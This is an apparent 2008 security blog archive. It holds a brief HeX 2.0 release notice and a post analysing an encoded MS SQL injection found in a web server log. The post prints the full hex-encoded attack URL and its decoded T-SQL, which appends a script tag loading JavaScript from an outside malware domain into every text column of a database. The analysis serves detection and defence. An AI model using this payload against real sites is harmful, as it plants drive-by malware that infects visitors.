Archive for the ‘Hack’ Category

HeX 2.0R Preview

Monday, October 6th, 2008

We are uploading HeX 2.0 Release image to mirror sites now, it is going to be released in another few hours. I won’t reveal much information here, for the time being, check out the preview images.

HeX 2.0 preview

By the way, if you have not updated your Wordpress installation to version 2.6.2, you should do it now. The hacking attempts are in the wild. This is the screen shot I had taken before I updated it weeks ago.

HeX 2.0 preview

Encoded SQL Injection

Thursday, April 24th, 2008

There is nothing new when you read security advisories on SQL injection vulnerabilities found on certain products or applications. Most of the SQL injection that I have dealt with are plain SQL code injection, which allow me to easily search the sign of SQL injection attack in http log, unless the bad guys are using POST method inside a form or something else.

Today I have discovered a rare encoded SQL injection in one website’s http log that targeted on a MS SQL database. The bad guys had used the HTTP method GET, with encoded code in the SQL injection code. It was not difficult to detect it due to its long URL, and below is the code.

script.asp?var=random';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

This is the decoded version of the HEX code in the CAST function:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.nihaorr1.com/1.js></script>''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

It seems that there is a loop in the HEX code to update the js script after 30 characters in the field, disregard if there are more than 30 characters in the field, the SQL code will be injected the first time, and another after 30th character.

With encoded SQL code, the injection could easily bypass IDS and prevention rules. Unless you have set the IDS to alert if certain number characters in URL is passing through the IDS, or inspected HTTP log from time to time.

The js script redirects users to another page, 1.htm, and then try to download the exploits which try to exploit outdated Real Player, and a few MS remote code execution vulnerabilities such as MS06-014, MS07-004, MS07-018 and a few others. So, make sure your Windows and other third party applications are always updated to the latest version or have the latest patch applied.

Updates:
It seems that this domain has been listed in malwaredomains.com since 17th April.